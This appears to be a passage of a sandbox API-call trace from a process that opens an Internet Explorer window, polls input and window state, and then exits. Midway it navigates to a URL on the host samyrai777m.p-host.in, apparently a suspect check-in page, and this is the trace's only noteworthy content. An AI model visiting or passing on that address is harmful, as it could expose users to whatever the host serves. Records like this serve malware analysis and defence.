[0084.415] SelectObject (hdc=0xd01091b, h=0x2d0a0967) returned 0x18a002e
[0084.415] GetFontUnicodeRanges (in: hdc=0xd01091b, lpgs=0x0 | out: lpgs=0x0) returned 0x27c
[0084.415] GetFontUnicodeRanges (in: hdc=0xd01091b, lpgs=0x2ba300 | out: lpgs=0x2ba300) returned 0x27c
[0084.415] SelectObject (hdc=0xd01091b, h=0x18a002e) returned 0x2d0a0967
[0084.415] SelectObject (hdc=0xd01091b, h=0x2d0a0967) returned 0x18a002e
[0084.415] GetCharWidth32W (in: hdc=0xd01091b, iFirst=0x20, iLast=0x7e, lpBuffer=0x20e070 | out: lpBuffer=0x20e070) returned 1
[0084.416] SelectObject (hdc=0xd01091b, h=0x18a002e) returned 0x2d0a0967
[0084.421] LsQueryLineDup () returned 0x0
[0084.422] IntersectRect (in: lprcDst=0x20f210, lprcSrc1=0x20f210, lprcSrc2=0x20f1e0 | out: lprcDst=0x20f210) returned 1
[0084.422] IntersectRect (in: lprcDst=0x2c5c50, lprcSrc1=0x2c5c50, lprcSrc2=0x20f200 | out: lprcDst=0x2c5c50) returned 1
[0084.422] UnionRect (in: lprcDst=0x20f850, lprcSrc1=0x20f850, lprcSrc2=0x20f7e0 | out: lprcDst=0x20f850) returned 1
[0084.422] RedrawWindow (hWnd=0x1021e, lprcUpdate=0x20f970, hrgnUpdate=0x0, flags=0x21) returned 1
[0084.422] EnumChildWindows (hWndParent=0x1021e, lpEnumFunc=0x7fee09de450, lParam=0x20f7a0) returned 0
[0084.422] EnumChildWindows (hWndParent=0x1021e, lpEnumFunc=0x7fee09de450, lParam=0x20f3d0) returned 0
[0084.422] GetCursorPos (in: lpPoint=0x20f400 | out: lpPoint=0x20f400*(x=631, y=286)) returned 1
[0084.423] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20f400 | out: lpPoint=0x20f400) returned 1
[0084.423] GetKeyState (nVirtKey=16) returned 0
[0084.423] GetKeyState (nVirtKey=17) returned 0
[0084.423] GetKeyState (nVirtKey=18) returned 0
[0084.423] GetKeyState (nVirtKey=160) returned 0
[0084.423] GetKeyState (nVirtKey=162) returned 0
[0084.423] GetKeyState (nVirtKey=164) returned 0
[0084.423] GetCapture () returned 0x0
[0084.423] GetCurrentThreadId () returned 0x628
[0084.423] GetCurrentThreadId () returned 0x628
[0084.423] GetCurrentThreadId () returned 0x628
[0084.423] GetFocus () returned 0x0
[0084.423] EnumChildWindows (hWndParent=0x1021e, lpEnumFunc=0x7fee09de450, lParam=0x20f3d0) returned 0
[0084.423] GetCursorPos (in: lpPoint=0x20f400 | out: lpPoint=0x20f400*(x=631, y=286)) returned 1
[0084.423] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20f400 | out: lpPoint=0x20f400) returned 1
[0084.423] GetKeyState (nVirtKey=16) returned 0
[0084.423] GetKeyState (nVirtKey=17) returned 0
[0084.423] GetKeyState (nVirtKey=18) returned 0
[0084.423] GetKeyState (nVirtKey=160) returned 0
[0084.423] GetKeyState (nVirtKey=162) returned 0
[0084.423] GetKeyState (nVirtKey=164) returned 0
[0084.423] GetCurrentThreadId () returned 0x628
[0084.423] GetCurrentThreadId () returned 0x628
[0084.423] GetCurrentThreadId () returned 0x628
[0084.423] EnumChildWindows (hWndParent=0x1021e, lpEnumFunc=0x7fee09de450, lParam=0x20f3d0) returned 0
[0084.423] GetCursorPos (in: lpPoint=0x20f400 | out: lpPoint=0x20f400*(x=631, y=286)) returned 1
[0084.423] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20f400 | out: lpPoint=0x20f400) returned 1
[0084.423] GetKeyState (nVirtKey=16) returned 0
[0084.423] GetKeyState (nVirtKey=17) returned 0
[0084.423] GetKeyState (nVirtKey=18) returned 0
[0084.423] GetKeyState (nVirtKey=160) returned 0
[0084.423] GetKeyState (nVirtKey=162) returned 0
[0084.423] GetKeyState (nVirtKey=164) returned 0
[0084.423] GetCapture () returned 0x0
[0084.423] GetCurrentThreadId () returned 0x628
[0084.423] GetCurrentThreadId () returned 0x628
[0084.423] GetCurrentThreadId () returned 0x628
[0084.424] GetCursorPos (in: lpPoint=0x20f400 | out: lpPoint=0x20f400*(x=631, y=286)) returned 1
[0084.424] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20f400 | out: lpPoint=0x20f400) returned 1
[0084.424] GetKeyState (nVirtKey=16) returned 0
[0084.424] GetKeyState (nVirtKey=17) returned 0
[0084.424] GetKeyState (nVirtKey=18) returned 0
[0084.424] GetKeyState (nVirtKey=160) returned 0
[0084.424] GetKeyState (nVirtKey=162) returned 0
[0084.424] GetKeyState (nVirtKey=164) returned 0
[0084.424] GetCurrentThreadId () returned 0x628
[0084.424] GetCurrentThreadId () returned 0x628
[0084.424] GetCurrentThreadId () returned 0x628
[0084.424] GetCursorPos (in: lpPoint=0x20f400 | out: lpPoint=0x20f400*(x=631, y=286)) returned 1
[0084.424] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20f400 | out: lpPoint=0x20f400) returned 1
[0084.424] GetKeyState (nVirtKey=16) returned 0
[0084.424] GetKeyState (nVirtKey=17) returned 0
[0084.424] GetKeyState (nVirtKey=18) returned 0
[0084.424] GetKeyState (nVirtKey=160) returned 0
[0084.424] GetKeyState (nVirtKey=162) returned 0
[0084.424] GetKeyState (nVirtKey=164) returned 0
[0084.424] GetCurrentThreadId () returned 0x628
[0084.424] GetCurrentThreadId () returned 0x628
[0084.424] GetCurrentThreadId () returned 0x628
[0084.424] GetCurrentThreadId () returned 0x628
[0084.424] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x20f930 | out: ppu=0x20f930) returned 0x0
[0084.424] IUnknown:AddRef (This=0x27e180) returned 0x7
[0084.424] IUri:GetAbsoluteUri (in: This=0x27e180, pbstrAbsoluteUri=0x20fa18 | out: pbstrAbsoluteUri=0x20fa18*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0084.424] IUnknown:Release (This=0x27e180) returned 0x6
[0084.424] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x7fefde70000
[0084.425] GetProcAddress (hModule=0x7fefde70000, lpProcName="VariantClear") returned 0x7fefde71180
[0084.425] ShouldShowIntranetWarningSecband () returned 0x0
[0084.431] GetIUriPriv () returned 0x0
[0084.431] IUnknown:Release (This=0x27e180) returned 0x6
[0084.431] GetCursorPos (in: lpPoint=0x20f6d0 | out: lpPoint=0x20f6d0*(x=631, y=286)) returned 1
[0084.432] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20f6d0 | out: lpPoint=0x20f6d0) returned 1
[0084.432] GetKeyState (nVirtKey=16) returned 0
[0084.432] GetKeyState (nVirtKey=17) returned 0
[0084.432] GetKeyState (nVirtKey=18) returned 0
[0084.432] GetKeyState (nVirtKey=160) returned 0
[0084.432] GetKeyState (nVirtKey=162) returned 0
[0084.432] GetKeyState (nVirtKey=164) returned 0
[0084.432] GetCurrentThreadId () returned 0x628
[0084.432] GetCurrentThreadId () returned 0x628
[0084.432] GetCurrentThreadId () returned 0x628
[0084.432] GetFocus () returned 0x0
[0084.432] EnumChildWindows (hWndParent=0x1021e, lpEnumFunc=0x7fee09de450, lParam=0x20f910) returned 0
[0084.432] LoadStringW (in: hInstance=0x7fef2350000, uID=0x1fe9, lpBuffer=0x20f630, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4
[0084.432] IUnknown:AddRef (This=0x27e180) returned 0x7
[0084.432] IUri:GetScheme (in: This=0x27e180, pdwScheme=0x20e968 | out: pdwScheme=0x20e968*=0x2) returned 0x0
[0084.432] IUri:GetDisplayUri (in: This=0x27e180, pbstrDisplayString=0x20e990 | out: pbstrDisplayString=0x20e990*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0084.432] GetWindowTextW (in: hWnd=0x1021a, lpString=0x20e4e0, nMaxCount=512 | out: lpString="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 49
[0084.432] IUnknown:Release (This=0x27e180) returned 0x6
[0084.432] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0084.432] SendMessageW (hWnd=0x10216, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0084.433] SendMessageW (hWnd=0x1021a, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0
[0084.434] SetWindowLongW (hWnd=0x1021a, nIndex=-16, dwNewLong=-2100363264) returned -2033254400
[0084.434] SetWindowLongW (hWnd=0x1021a, nIndex=-20, dwNewLong=262144) returned 262400
[0084.434] SetWindowPos (hWnd=0x1021a, hWndInsertAfter=0xfffffffffffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0084.436] GlobalAddAtomW (lpString=0x0) returned 0x0
[0084.436] SetPropW (hWnd=0x10216, lpString=0x0, hData=0x10216) returned 0
[0084.436] SetWindowPos (hWnd=0x1021a, hWndInsertAfter=0x0, X=-2000, Y=-2000, cx=0, cy=0, uFlags=0x15) returned 1
[0084.437] SetWindowPos (hWnd=0x1021a, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x16)
[0084.438] GetClientRect (in: hWnd=0x1021a, lpRect=0x20ed50 | out: lpRect=0x20ed50) returned 1
[0084.438] GetClientRect (in: hWnd=0x1021a, lpRect=0x20ed80 | out: lpRect=0x20ed80) returned 1
[0084.438] CreateRectRgnIndirect (lprect=0x20ec80) returned 0x9040944
[0084.438] SetWindowRgn (hWnd=0x1021e, hRgn=0x9040944, bRedraw=1) returned 1
[0084.438] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.438] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x46, wParam=0x0, lParam=0x20eb00*=66078, plResult=0x20e8f0 | out: plResult=0x20e8f0) returned 0x1
[0084.438] NtdllDefWindowProc_W () returned 0x0
[0084.438] GetCurrentThreadId () returned 0x628
[0084.439] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.439] GetCurrentThreadId () returned 0x628
[0084.440] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.440] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x47, wParam=0x0, lParam=0x20eb00*=66078, plResult=0x20e8f0 | out: plResult=0x20e8f0) returned 0x1
[0084.440] NtdllDefWindowProc_W () returned 0x0
[0084.440] GetCurrentThreadId () returned 0x628
[0084.440] CreateRectRgnIndirect (lprect=0x7fee0f5a200) returned 0x9040918
[0084.440] GetUpdateRgn (hWnd=0x1021e, hRgn=0x9040918, bErase=0) returned 1
[0084.440] DeleteObject (ho=0x9040918) returned 1
[0084.440] SetWindowPos (hWnd=0x1021e, hWndInsertAfter=0x0, X=0, Y=0, cx=116, cy=0, uFlags=0x14) returned 1
[0084.440] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.440] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x46, wParam=0x0, lParam=0x20ebf0*=66078, plResult=0x20e9e0 | out: plResult=0x20e9e0) returned 0x1
[0084.440] NtdllDefWindowProc_W () returned 0x0
[0084.440] GetCurrentThreadId () returned 0x628
[0084.440] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.440] GetCurrentThreadId () returned 0x628
[0084.441] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.441] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x47, wParam=0x0, lParam=0x20ebf0*=66078, plResult=0x20e9e0 | out: plResult=0x20e9e0) returned 0x1
[0084.441] NtdllDefWindowProc_W () returned 0x0
[0084.441] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.441] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x5, wParam=0x0, lParam=0x74, plResult=0x20e330 | out: plResult=0x20e330) returned 0x1
[0084.441] NtdllDefWindowProc_W () returned 0x0
[0084.441] GetCurrentThreadId () returned 0x628
[0084.441] GetCurrentThreadId () returned 0x628
[0084.441] GetCurrentThreadId () returned 0x628
[0084.444] ShowWindow (hWnd=0x1021a, nCmdShow=1) returned 0
[0084.458] GetFocus () returned 0x0
[0084.458] SetFocus (hWnd=0x1021e) returned 0x0
[0084.458] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.458] GetKeyState (nVirtKey=1) returned 1
[0084.458] GetKeyState (nVirtKey=2) returned 0
[0084.458] GetKeyState (nVirtKey=16) returned 0
[0084.458] GetKeyState (nVirtKey=17) returned 0
[0084.458] GetKeyState (nVirtKey=4) returned 0
[0084.458] GetKeyState (nVirtKey=18) returned 0
[0084.458] GetMessageTime () returned 140650
[0084.458] GetMessagePos () returned 0x20202af
[0084.458] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x20e520 | out: plResult=0x20e520) returned 0x0
[0084.458] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.458] GetKeyState (nVirtKey=1) returned 1
[0084.458] GetKeyState (nVirtKey=2) returned 0
[0084.458] GetKeyState (nVirtKey=16) returned 0
[0084.458] GetKeyState (nVirtKey=17) returned 0
[0084.458] GetKeyState (nVirtKey=4) returned 0
[0084.458] GetKeyState (nVirtKey=18) returned 0
[0084.458] GetMessageTime () returned 140650
[0084.458] GetMessagePos () returned 0x20202af
[0084.458] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x20db80 | out: plResult=0x20db80) returned 0x0
[0084.459] SetTimer (hWnd=0x1021e, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0084.459] GetCurrentThreadId () returned 0x628
[0084.459] GetCurrentThreadId () returned 0x628
[0084.459] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.459] GetMessageTime () returned 140650
[0084.459] GetMessagePos () returned 0x20202af
[0084.459] GetCursorPos (in: lpPoint=0x20e900 | out: lpPoint=0x20e900*(x=631, y=286)) returned 1
[0084.459] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20e900 | out: lpPoint=0x20e900) returned 1
[0084.459] GetKeyState (nVirtKey=16) returned 0
[0084.459] GetKeyState (nVirtKey=17) returned 0
[0084.459] GetKeyState (nVirtKey=18) returned 0
[0084.459] GetKeyState (nVirtKey=160) returned 0
[0084.459] GetKeyState (nVirtKey=162) returned 0
[0084.459] GetKeyState (nVirtKey=164) returned 0
[0084.459] GetCursorPos (in: lpPoint=0x20e900 | out: lpPoint=0x20e900*(x=631, y=286)) returned 1
[0084.459] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x20e900 | out: lpPoint=0x20e900) returned 1
[0084.459] GetKeyState (nVirtKey=16) returned 0
[0084.459] GetKeyState (nVirtKey=17) returned 0
[0084.459] GetKeyState (nVirtKey=18) returned 0
[0084.459] GetKeyState (nVirtKey=160) returned 0
[0084.459] GetKeyState (nVirtKey=162) returned 0
[0084.459] GetKeyState (nVirtKey=164) returned 0
[0084.459] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x20eca0 | out: plResult=0x20eca0) returned 0x1
[0084.459] NtdllDefWindowProc_W () returned 0x0
[0084.459] GetCurrentThreadId () returned 0x628
[0084.460] GetClientRect (in: hWnd=0x1021a, lpRect=0x20f110 | out: lpRect=0x20f110) returned 1
[0084.460] GetClientRect (in: hWnd=0x1021a, lpRect=0x20f140 | out: lpRect=0x20f140) returned 1
[0084.460] UpdateWindow (hWnd=0x1021a) returned 1
[0084.460] GetCurrentThreadId () returned 0x628
[0084.461] GetCurrentThreadId () returned 0x628
[0084.461] GetCurrentThreadId () returned 0x628
[0084.461] IsWinEventHookInstalled (event=0x8005) returned 0
[0084.461] StrCmpICW (pszStr1="about:blank", pszStr2="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned -7
[0084.461] StrCmpICW (pszStr1="about:blank", pszStr2="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned -7
[0084.461] GetCurrentThreadId () returned 0x628
[0084.461] GetCurrentThreadId () returned 0x628
[0084.461] GetCurrentThreadId () returned 0x628
[0084.461] GetCurrentThreadId () returned 0x628
[0084.522] IntersectRect (in: lprcDst=0x20f210, lprcSrc1=0x20f210, lprcSrc2=0x20f1e0 | out: lprcDst=0x20f210) returned 0
[0084.522] IntersectRect (in: lprcDst=0x2c5c50, lprcSrc1=0x2c5c50, lprcSrc2=0x20f200 | out: lprcDst=0x2c5c50) returned 0
[0084.522] UnionRect (in: lprcDst=0x20f850, lprcSrc1=0x20f850, lprcSrc2=0x20f7e0 | out: lprcDst=0x20f850) returned 0
[0084.629] IsWinEventHookInstalled (event=0x8005) returned 0
[0084.629] GetCurrentThreadId () returned 0x628
[0084.630] GetCurrentThreadId () returned 0x628
[0084.630] GetCurrentThreadId () returned 0x628
[0084.633] GetMessageTime () returned 147670
[0084.633] GetMessagePos () returned 0x11e0277
[0084.633] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x20eeb0 | out: plResult=0x20eeb0) returned 0x0
[0084.633] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.633] GetKeyState (nVirtKey=1) returned 1
[0084.633] GetKeyState (nVirtKey=2) returned 0
[0084.633] GetKeyState (nVirtKey=16) returned 0
[0084.633] GetKeyState (nVirtKey=17) returned 0
[0084.633] GetKeyState (nVirtKey=4) returned 0
[0084.633] GetKeyState (nVirtKey=18) returned 0
[0084.633] GetMessageTime () returned 147670
[0084.633] GetMessagePos () returned 0x11e0277
[0084.633] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x20e510 | out: plResult=0x20e510) returned 0x0
[0084.633] GetCurrentThreadId () returned 0x628
[0084.633] GetCurrentThreadId () returned 0x628
[0084.634] PostQuitMessage (nExitCode=0)
[0084.634] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.634] RevokeDragDrop (hwnd=0x1021e) returned 0x0
[0084.634] GetCurrentThreadId () returned 0x628
[0084.634] GetWindowLongPtrW (hWnd=0x1021e, nIndex=-21) returned 0x28d790
[0084.634] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x2c4110, hWnd=0x1021e, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x20f860 | out: plResult=0x20f860) returned 0x1
[0084.634] NtdllDefWindowProc_W () returned 0x0
[0084.634] GetCurrentThreadId () returned 0x628
[0084.634] SetWindowLongPtrW (hWnd=0x1021e, nIndex=-21, dwNewLong=0x0) returned 0x28d790
[0084.634] GetMessageW (in: lpMsg=0x20fca0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x20fca0) returned 0
[0084.634] IsWinEventHookInstalled (event=0x8005) returned 0
[0084.634] GetCurrentThreadId () returned 0x628
[0084.634] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x2c4110) returned 0x0
[0084.634] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20fac8 | out: phkResult=0x20fac8*=0x210) returned 0x0
[0084.634] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20fad0 | out: phkResult=0x20fad0*=0x49c) returned 0x0
[0084.635] RegOpenKeyExW (in: hKey=0x49c, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x20fa58 | out: phkResult=0x20fa58*=0x0) returned 0x2
[0084.635] RegOpenKeyExW (in: hKey=0x210, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x20fa58 | out: phkResult=0x20fa58*=0x0) returned 0x2
[0084.635] RegCloseKey (hKey=0x0) returned 0x6
[0084.635] RegCloseKey (hKey=0x0) returned 0x6
[0084.635] RegCloseKey (hKey=0x210) returned 0x0
[0084.635] RegCloseKey (hKey=0x49c) returned 0x0
[0084.635] GetCurrentThreadId () returned 0x628
[0084.635] GetCurrentThreadId () returned 0x628
[0084.635] GetCurrentThreadId () returned 0x628
[0084.635] GetCurrentThreadId () returned 0x628
[0084.635] GetCurrentThreadId () returned 0x628
[0084.635] IUnknown:Release (This=0x2e8c60) returned 0x1
[0084.635] GetCurrentThreadId () returned 0x628
[0084.635] GetCurrentThreadId () returned 0x628
[0084.635] GetCurrentThreadId () returned 0x628
[0084.635] IUnknown:Release (This=0x305660) returned 0x0
[0084.637] ISystemDebugEventFire:EndSession (This=0x2e8c60) returned 0x0
[0084.637] IUnknown:Release (This=0x2e8c60) returned 0x0
[0084.637] GetUserDefaultLCID () returned 0x409
[0084.637] GetACP () returned 0x4e4
[0084.637] IUnknown:Release (This=0x2912c0) returned 0x0
[0084.637] IUnknown:Release (This=0x28e1b8) returned 0x0
[0084.637] IUnknown:Release (This=0x7fee1042708) returned 0x1
[0084.637] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x20fb80 | out: ppURI=0x20fb80*=0x27d5a0) returned 0x0
[0084.637] IUri:GetScheme (in: This=0x27d5a0, pdwScheme=0x20fac0 | out: pdwScheme=0x20fac0*=0x11) returned 0x0
[0084.638] IUnknown:QueryInterface (in: This=0x27d5a0, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20fac0 | out: ppvObject=0x20fac0*=0x27d5a0) returned 0x0
[0084.638] IUnknown:Release (This=0x27d5a0) returned 0x2
[0084.638] IUnknown:AddRef (This=0x27d5a0) returned 0x3
[0084.638] IUnknown:Release (This=0x27d5a0) returned 0x2
[0084.638] IUri:IsEqual (in: This=0x27e180, pUri=0x27d5a0, pfEqual=0x20fb60 | out: pfEqual=0x20fb60*=0) returned 0x0
[0084.638] IUnknown:Release (This=0x27e180) returned 0x5
[0084.638] IUnknown:AddRef (This=0x27d5a0) returned 0x3
[0084.638] IUri:GetAbsoluteUri (in: This=0x27d5a0, pbstrAbsoluteUri=0x28f2a0 | out: pbstrAbsoluteUri=0x28f2a0*="about:blank") returned 0x0
[0084.638] IUnknown:Release (This=0x27d5a0) returned 0x2
[0084.638] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x7feff5e0000
[0084.638] GetProcAddress (hModule=0x7feff5e0000, lpProcName="InternetUnlockRequestFile") returned 0x7feff5f70f4
[0084.638] InternetUnlockRequestFile (in: hLockRequestInfo=0x2c37d0 | out: hLockRequestInfo=0x2c37d0) returned 1
[0084.639] IUnknown:Release (This=0x27e180) returned 0x4
[0084.639] IUnknown:Release (This=0x27e180) returned 0x3
[0084.639] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x28e1a8, dwReserved=0x0 | out: ppSM=0x28e1a8*=0x2c7e40) returned 0x0
[0084.640] IInternetSecurityManager:SetSecuritySite (This=0x2c7e40, pSite=0x28e1b8) returned 0x0
[0084.640] IUnknown:AddRef (This=0x28e1b8) returned 0x31
[0084.640] IUnknown:QueryInterface (in: This=0x28e1b8, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x20f490 | out: ppvObject=0x20f490*=0x28e1c0) returned 0x0
[0084.640] IServiceProvider:QueryService (in: This=0x28e1c0, guidService=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x2c7e88 | out: ppvObject=0x2c7e88*=0x0) returned 0x80004002
[0084.640] IServiceProvider:QueryService (in: This=0x28e1c0, guidService=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x2c7e80 | out: ppvObject=0x2c7e80*=0x0) returned 0x80004002
[0084.640] IServiceProvider:QueryService (in: This=0x28e1c0, guidService=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2c7e78 | out: ppvObject=0x2c7e78*=0x7fee1042708) returned 0x0
[0084.640] IUnknown:Release (This=0x28e1c0) returned 0x0
[0084.640] IUnknown:AddRef (This=0x27d5a0) returned 0x3
[0084.640] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x26fff0) returned 0x800c0011
[0084.640] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0084.640] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0084.640] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0084.640] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x20f590, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x20f590*=0x0) returned 0x0
[0084.640] IUnknown:Release (This=0x27d5a0) returned 0x2
[0084.640] IUnknown:Release (This=0x265140) returned 0x1
[0084.640] IUnknown:Release (This=0x27d5a0) returned 0x1
[0084.641] IUnknown:Release (This=0x2c7e40) returned 0x0
[0084.641] IUnknown:Release (This=0x28e1b8) returned 0x0
[0084.641] IUnknown:Release (This=0x7fee1042708) returned 0x7fff
[0084.641] IUnknown:Release (This=0x28ed90) returned 0x0
[0084.641] IInternetSession:UnregisterNameSpace (This=0x294ce0, pCF=0x7fee1044f60, pszProtocol="res") returned 0x0
[0084.641] IUnknown:Release (This=0x7fee1044f60) returned 0x1
[0084.641] IInternetSession:UnregisterNameSpace (This=0x294ce0, pCF=0x7fee1044fa0, pszProtocol="about") returned 0x0
[0084.641] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0084.641] IUnknown:Release (This=0x294ce0) returned 0x1
[0084.641] IUnknown:Release (This=0x294e70) returned 0x0
[0084.642] GetExitCodeThread (in: hThread=0x354, lpExitCode=0x20fad0 | out: lpExitCode=0x20fad0) returned 1
[0084.642] CloseHandle (hObject=0x350) returned 1
[0084.642] CloseHandle (hObject=0x354) returned 1
[0084.642] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x2c4110) returned 0x0
[0084.642] ReleaseActCtx (in: hActCtx=0x28b918 | out: hActCtx=0x28b918)
[0084.642] FreeLibrary (hLibModule=0x7fef2350000) returned 1
[0084.642] FreeLibrary (hLibModule=0x7fef2350000) returned 1
[0084.645] UnregisterClassW (lpClassName=0xc199, hInstance=0x7fee0880000) returned 1
[0084.645] UnregisterClassW (lpClassName=0xc197, hInstance=0x7fee0880000) returned 1
[0084.645] OleUninitialize ()
[0084.645] DestroyWindow (hWnd=0x10216) returned 1
[0084.646] PostQuitMessage (nExitCode=0)
[0084.646] DllCanUnloadNow () returned 0x0
[0084.646] DllCanUnloadNow () returned 0x0
[0084.646] DllCanUnloadNow () returned 0x1
[0084.850] FreeLibrary (hLibModule=0x7fee0880000) returned 1
[0084.850] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0
[0084.851] RtlExitUserProcess (ExitCode=0x0)
Thread:
id = 76
os_tid = 0x9c8
Thread:
id = 81
os_tid = 0x744
[0067.659] GetCurrentThreadId () returned 0x744
Thread:
id = 82
os_tid = 0x7d8
